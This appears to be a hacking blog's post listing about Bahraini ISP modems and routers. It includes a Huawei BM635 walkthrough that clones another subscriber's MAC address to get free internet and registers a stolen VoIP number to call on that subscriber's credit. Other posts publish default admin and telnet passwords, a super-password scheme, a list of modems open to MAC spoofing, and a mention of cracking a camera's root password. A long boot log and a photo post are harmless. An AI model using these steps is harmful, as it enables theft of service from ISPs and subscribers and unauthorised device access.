Thursday, May 20, 2021
Hack: Cracked Super User of Huawei HG8245Q / HG8245Q2 ONT (from Batelco)
by r00tsh3ll at May 20, 2021 0 Comments
Tags: #hacking #Cracking #hashcracking #batelco #HuaweiRouter #HG8245 #Bahrain
Thursday, March 21, 2019
Hacking Huawei HG8245Q / HG8245Q2 ONT (from Batelco) to get Administrator access
Done!
by r00tsh3ll at March 21, 2019 5 Comments
Wednesday, February 13, 2019
Hacking Infinova V1772N-T series PTZ camera (for remote restart)
Issue: Camera web interface becomes unresponsive after running for few days. Can't access the camera through web browser even though port 80 is open. Telnet daemon port 23 open but username & password are unknown. Contacted Infinova support several times but no solution.
The only solution to get the camera up and running is to physically power off / cut the power to camera and then power up.
Dumped the passwd/shadow file and cracked the root DES encrypted password.
Soluton:
Login via telnet using root credential and reboot the camera remotely or restart webs service.
After getting root:
root@INFINOVA # cat /proc/mtd
dev: size erasesize name
mtd0: 000c0000 00020000 "mboot1"
mtd1: 00320000 00020000 "kernel1"
mtd2: 00320000 00020000 "kernel2"
mtd3: 00220000 00020000 "initrd1"
mtd4: 00220000 00020000 "initrd2"
mtd5: 04680000 00020000 "rootfs"
mtd6: 0ae40000 00020000 "data"
END!
by r00tsh3ll at February 13, 2019 1 Comments
Sunday, January 3, 2016
Tuesday, July 21, 2015
Hacking G-Share2 (Satellite Card Sharing Client) Subscription
by r00tsh3ll at July 21, 2015 3 Comments
Monday, November 10, 2014
Zain Broadband 2.0 (Security flaws): Free Internet/VoIP calls with Huawei Echolife BM635
- Login to Huawei Echolife BM635 via telnet.telnet 192.168.1.1
- Enter username / password and then press ENTER
username: huawei
password: Adt26BnE
- At ATP prompt
type setallmacaddr XX:XX:XX:XX:XX:XX & then press ENTER (where XX:XX:XX:XX:XX:XX is a valid WAN MAC address)
e.g. ATP> setallmacaddr 4C:54:99:12:12:12
- Type restoredef & press ENTER
- Huawei BM635 will restart with new MAC address and default configuration.
- If done correctly then you will be connected to the Internet (with subscriber IP address)
- Point your browser to 192.168.1.1
- Login using admin:2gzVL6MT
- Click on Basic > VoIP > SIP User
- Enter SIP Super Password (link)
then enter a valid VoIP number in SIP ID & Username fields
Note: SIP ID & Username are same i.e.
SIP ID: 13644272
Username: 13644272
Password: !@#$%^&*()_ - Click on Apply then on Register
Note: This will only work if you are using Zain WiMAX
- If done correctly then you can call for free (using subscriber call credit)
END!
by Anonymous at November 10, 2014 3 Comments
Tags: Zain Bahrain, Zain Broadband 2.0, Zain VoIP, Zain Wimax Hack
Monday, November 3, 2014
Zain Broadband 2.0 (Wimax): NEW Admin Password
Get Full Access to your device (OWN IT)
WebGUI Login Detail
Username: admin
Password: 2gzVL6MT
Telnet Login Detail
Username: huawei
Password: Adt26BnE
SIP Super Password
Password: Reverse WAN MAC + R3bKaA
Wimax Super Password
Password: Reverse WAN MAC + hUm2A786
For Example
If WAN MAC is 84:A2:5F:3D:CD:2E
then Reverse WAN MAC will be E2DCD3F52A48
Screenshots
by Anonymous at November 03, 2014 3 Comments
Tags: Hardware Hacking, Huawei BM635, Zain Broadband 2.0, Zain Wimax
Wednesday, October 19, 2011
DV-250 WiMAX modem boot log
Ethernet eth0: MAC address 00:15:f2:0d:4f:9b
IP: 192.168.0.8/255.255.255.0, Gateway: 192.168.0.1
Default server: 192.168.0.1
RedBoot(tm) bootstrap and debug environment [ROMRAM]
Non-certified release, version UNKNOWN - built 20:17:12, Aug 11 2009
Platform: MT7108APP (ARM9)
Copyright (C) 2000, 2001, 2002, 2003, 2004 Red Hat, Inc.
Copyright (C) 2003, 2004, 2005, 2006 eCosCentric Limited
RAM: 0x00000000-0x02ffc000, [0x0002dc18-0x02fe9000] available
FLASH: 0x60000000 - 0x60e80000, 232 blocks of 0x00010000 bytes each.
RedBoot> mfill -b 0x80000008 -l 4 -4 -p 0x3D
RedBoot> mfill -b 0x80000008 -l 4 -p 0xffffffff -4
RedBoot> cache on
RedBoot> fs mount -d /dev/flash1 -t jffs2 /flash
RedBoot> fs cd /flash
RedBoot> load -m file -b 0x600000 -r zImage
Raw file loaded 0x00600000-0x0075444b, assumed entry at 0x00600000
RedBoot> load -m file -b 0x1000000 -r initrd
Raw file loaded 0x01000000-0x01484fff, assumed entry at 0x01000000
RedBoot> exec -z -b 0x600000
Uncompressing Linux............................................................................................ done, booting the kernel.
Linux version 2.6.10_mvl401-versatile926ejs (root@Ubuntu-WS) (gcc version 3.4.4) #1 Mon Nov 9 21:27:14 CST 2009
CPU: ARM926EJ-Sid(wb) [41069265] revision 5 (ARMv5TEJ)
CPU0: D VIVT write-back cache
CPU0: I cache: 16384 bytes, associativity 4, 32 byte lines, 128 sets
CPU0: D cache: 16384 bytes, associativity 4, 32 byte lines, 128 sets
Machine: MT7108
Memory policy: ECC disabled, Data cache writeback
Built 1 zonelists
Kernel command line: console=ttyS1,115200n1 mem=48M@0M initrd=0x1000000,0x800000 ramdisk_size=8192 root=/dev/ram
PID hash table entries: 256 (order: 8, 4096 bytes)
Console: colour dummy device 80x30
Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
Memory: 48MB = 48MB total
Memory: 37400KB available (2399K code, 502K data, 104K init)
Mount-cache hash table entries: 512 (order: 0, 4096 bytes)
CPU: Testing write buffer coherency: ok
spawn_desched_task(00000000)
desched cpu_callback 3/00000000
ksoftirqd started up.
desched cpu_callback 2/00000000
desched thread 0 started up.
checking if image is initramfs...it isn't (bad gzip magic numbers); looks like an initrd
Freeing initrd memory: 8192K
NET: Registered protocol family 16
PCI: bus0: Fast back to back transfers enabled
SCSI subsystem initialized
usbcore: registered new driver hub
NetWinder Floating Point Emulator V0.97 (double precision)
Registering GDB sysrq handler
Installing knfsd (copyright (C) 1996 [email protected]).
JFFS2 version 2.2. (NAND) (C) 2001-2003 Red Hat, Inc.
Initializing Cryptographic API
Serial: 8250/16550 driver $Revision: 1.90 $ 2 ports, IRQ sharing disabled
ttyS1 at MMIO 0x800a0000 (irq = 7) is a 16550A
io scheduler noop registered
io scheduler anticipatory registered
io scheduler deadline registered
io scheduler cfq registered
RAMDISK driver initialized: 16 RAM disks of 8192K size 1024 blocksize
PPP generic driver version 2.4.2
PPP Deflate Compression module registered
PPP BSD Compression module registered
MPPE/MPPC encryption/compression module registered
Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2
ide: Assuming 50MHz system bus speed for PIO modes; override with idebus=xx
elevator: using anticipatory as default io scheduler
Initializing USB Mass Storage driver...
usbcore: registered new driver usb-storage
USB Mass Storage support registered.
mice: PS/2 mouse device common for all mice
u32 classifier
OLD policer on
NET: Registered protocol family 2
IP: routing cache hash table of 512 buckets, 4Kbytes
TCP: Hash tables configured (established 4096 bind 8192)
ip_conntrack version 2.1 (384 buckets, 3072 max) - 360 bytes per conntrack
ip_tables: (C) 2000-2002 Netfilter core team
ipt_recent v0.3.1: Stephen Frost
ClusterIP Version 0.6 loaded successfully
Initializing XFRM netlink socket
NET: Registered protocol family 1
NET: Registered protocol family 17
NET: Registered protocol family 15
Bridge firewalling registered
802.1Q VLAN Support v1.8 Ben Greear
All bugs added by David S. Miller
RAMDISK: cramfs filesystem found at block 0
RAMDISK: Loading 4628KiB [1 disk] into ram disk... | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / - \ | / done.
VFS: Mounted root (cramfs filesystem) readonly.
Freeing init memory: 104K
init started: BusyBox v1.6.1 (2009-11-09 21:34:32 CST) multi-call binary
starting pid 727, tty '': '/etc/rcS'
[WATCHDOG] check_umac_health=on timeout=31 interval=5
gpio: module license 'unspecified' taints kernel.
init mod-gpio
init mod-ledbutton
register fastpath id=3 net_device=c2b03800 name=vth%d if_type=2 hard_header_len=14
Searching for RedBoot partition table in MTDCCIF at offset 0x30000
4 RedBoot partitions found on MTD device MTDCCIF
Creating 4 MTD partitions on "MTDCCIF":
0x00000000-0x00030000 : "RedBoot_arm9"
rfd_ftl: no RFD magic found in 'RedBoot_arm9'.
0x00030000-0x0003f000 : "FIS directory"
0x0003f000-0x00040000 : "RedBoot config"
0x00040000-0x00e40000 : "etc_plus"
rfd_ftl: no RFD magic found in 'etc_plus'.
mtd_partitions add
mount etc -> mtd3
init mod-ksocket
******************************************************************
******************************************************************
insmod hostdriver.ko
******************************************************************
******************************************************************
wmx0: Dropping NETIF_F_SG since no checksum feature.
register fastpath id=1 net_device=c2df8000 name=wmx0 if_type=1 hard_header_len=14
register fastpath id=0 net_device=c2d9dc00 name=eth%d if_type=0 hard_header_len=14
eth0: IC+ IP101A
8139too Fast Ethernet driver 0.9.27
modprobe: module star_ether not found
modprobe: failed to load module star_ether
clock is 40MHz
DPLL = c3020
Initializing MUSB Driver (x.x) [debug=0][gadget=no][otg=no] REV=1
direct_bus_init 259: Probing direct bus [direct=1]
MGC_LinuxInitController 2058: MUSB Driver [Base Address(PA)=0xc3846000]
[IRQ = 13]
[pDevice=bf047948]
MGC_HdrcInit 1048: ConfigData=0xdf (UTMI-16, dyn FIFOs, bulk combine, bulk split, HB-ISO Rx, HB-ISO Tx, SoftConn)
MGC_HdrcInit 1074: xDRC version 2.0
end=0 TXRX sz=3 addr=0 offset=0
end=1 TX sz=6 addr=8 offset=64
end=2 RX sz=6 addr=72 offset=576
end=3 TX sz=3 addr=136 offset=1088
end=4 RX sz=3 addr=144 offset=1152
MGC_LinuxInitController 2150: End 00: Shared FIFO TxSize=0040/RxSize=0040
MGC_LinuxInitController 2150: End 01: FIFO TxSize=0200/RxSize=0000
MGC_LinuxInitController 2150: End 02: FIFO TxSize=0000/RxSize=0200
MGC_LinuxInitController 2150: End 03: FIFO TxSize=0040/RxSize=0000
MGC_LinuxInitController 2150: End 04: FIFO TxSize=0000/RxSize=0040
musb-hcd usb0: new USB bus registered, assigned bus number 1
mgc_init_bus 1934: Registered new bus @c17338e0
hub 1-0:1.0: USB hub found
hub 1-0:1.0: 1 port detected
[Starting] sncfgd ... ----------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Congratulation, WMM initialized successfully
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
OK
[Starting] networking
device eth0 entered promiscuous mode
br0: port 1(eth0) entering learning state
br0: topology change detected, propagating
br0: port 1(eth0) entering forwarding state
.
[Starting] FW/NAT
ip_conntrack_pptp version 2.1 loaded
ip_nat_pptp version 2.0 loaded
.
[Strating] syslog and klog daemon ... OK
[wifi] Starting....
WLAN_LOCK=1
[wifi] initial wifi config file.
rtusb init --->
usbcore: registered new driver rt2870
ifconfig: SIOCGIFFLAGS: No such device
usbcore: deregistering driver rt2870
<--- rtusb exit [wifi] The device is not ready. [wifi] Failed to generate wifi config file. rtusb init --->
usbcore: registered new driver rt2870
WLAN_AUTO_SSIDWEP=,
WLAN_LOCK=0
Starting SW RTCThu Jan 1 00:04:00 UTC 1970
Thu Jan 1 08:06:00 LST 1970
SW_RTC_TIMESTAMP=010100061970.00
--- to install system time log (SW RTC)[Translating] crontab ... OK
.
[Starting] ssh server OK
[Starting] httpd serverWMX_AUTO_RECONNECT=1
/bin/lighttpd /usr/www_gemtek/lighttpd.conf ... lighttpd: copy conf filecp: cannot stat '/usr/www_gemtek/p1nadmin': No such file or directory
cp: cannot stat '/usr/www_gemtek/p1nadminJ': No such file or directory
.
OK
[Starting] httpd server/bin/mini_httpd.elf /etc/conf/mini_httpd.conf ... .
OK
[Starting] https server/usr/trans/httpsd.trans ... /bin/mini_httpd.elf /etc/conf/mini_httpsd.conf ... .
OK
Starting miniupnpd.
[Starting] telnet server/usr/sbin/telnetd -p 23 ... OK
[Strating] dhcp server ... /usr/trans/dhcpd.trans ... /usr/sbin/udhcpd /etc/conf/udhcpd.conf ... OK
/tmp/rcS: line 1: /etc/rc.d/S07networking_wan: Permission denied
[Starting] wimac upgrade checking ...
[Strating] zebra daemon ... /usr/trans/sroute.trans ... /usr/sbin/zebra -d -f /etc/conf/zebra.conf -i /var/run/zebra.pid ... OK
[Strating] rip daemon ... rip daemon was configured to be disabled ... FAIL
[Strating] VoIP ...
modprobe vdspsw kernel modules ...
probe info: pcm version=1, slic_typ=3215, chan_num=1, call/session_num=4
control PSTN-Relay
init mod-syss
init mod-pcm2
pcm_ver = 1
pcm_chan_no = 1
pcm_mmap_flushall = 0
pcm_mangle = 1
pcm_dsp_log_sz = 8000
init mod-lec, ch=1 Nov 9 2009 15:47:45
Init mod-drc drc_ch_num=1 Nov 9 2009 15:47:51
DSP: <1>init mod-dsp
init mod-slic3
start init slic=4294940183l
probe channel num=1
Silicon driver:si321x 0 reg 0 = C3 reg1 = 88
Silicon driver:si321x loading indirect registers
Silicon driver:si321x 0 checking for foreign volt source
Silicon driver:si321x 0 bringing up vbat 0
Silicon driver:si321x running cal 1
Silicon driver:si321x running cal 2
Silicon driver:si321x 0 cmdac and difdac cal start
Silicon driver:si321x manual cal ring starting
Silicon driver:si321x manual cal tip starting
Silicon driver:si321x 0 long balance cal starting
Silicon driver:si321x 0 long balance cal waiting for active line(s) to charge
Silicon driver:si321x 0 long balance cal executing
Silicon driver:si321x 0 cal sequence finished
Silicon driver:Si321x_PCMStart
dtnf init ch=1
DTMF_MAIN: dtmf_main_init: add to pcm engine, 0
FMTD: Enable Channel 0
SLIC2: <1>init mod-fxs3
init slic end=4294940475l
modprobe slic2 result=0
init mod-ortp
oRTP-0.13.1 initialized.<1>init mod-foip
init mod-acodec
init mod-vdsp for 1 channels 4 sessions
VDSP V 2.0.4 (Nov 9 2009 15:49:49)
voip_insert_modules result=0 ...
reset cfg channel number to 1
voip.cfg exist
voip_feature.cfg exist
voip.conf exist
voip_feature.conf exist
[Translating] crontab ...init voipconf_init, Nov 9 2009 16:04:51
OK
port=5060
System Info: Max Line Number:1, Max Account Number:1, Max Call Number:4
Build @ Date:Nov 9 2009, Time:16:05:08
VOIP_SERVER_PROXY_ADDR=10.109.2.6
VOIP_SERVER_PROXY_PORT=5060
VOIP_SERVER_REGISTRAR_ADDR=10.109.2.6
VOIP_SERVER_REGISTRAR_PORT=5060
VOIP_SERVER_OUTBOUND_ADDR=10.109.2.6
VOIP_SERVER_OUTBOUND_PORT=5060
VOIP_COMM_SIP_DOMAIN=10.109.2.6
[Starting] crond ... OK
[Starting] auto reconnect to BS ... OK
starting pid 1748, tty '': '/sbin/getty'
mt7xxx login:
END!
by Anonymous at October 19, 2011 5 Comments
Tags: DV-250 modem
Sunday, October 16, 2011
Friday, October 7, 2011
WiMAX modems: Whose MAC can be changed
BM635 (tested)
BM625 (similar to BM635)
BM622 (tested)
BM622i (tested)
and many more....
(almost all Huawei Wimax modems)
==================
ZyXEL
HES-319M (tested)
MAX-318M (tested)
==================
Motorola
CPEi 35775 (tested [needs device certificate])
==================
Most of the ISPs uses MAC address for authentication to allow a modem (with valid/active MAC) to get connected to the Network. So by changing the MAC, it is possible to get Free Internet....
by Anonymous at October 07, 2011 143 Comments
Tags: WIMAX MAC change
Thursday, September 22, 2011
A view from top of Bahrain Chamber of Commerce & Industry
by Root Shell at September 22, 2011 0 Comments
Tags: BCCI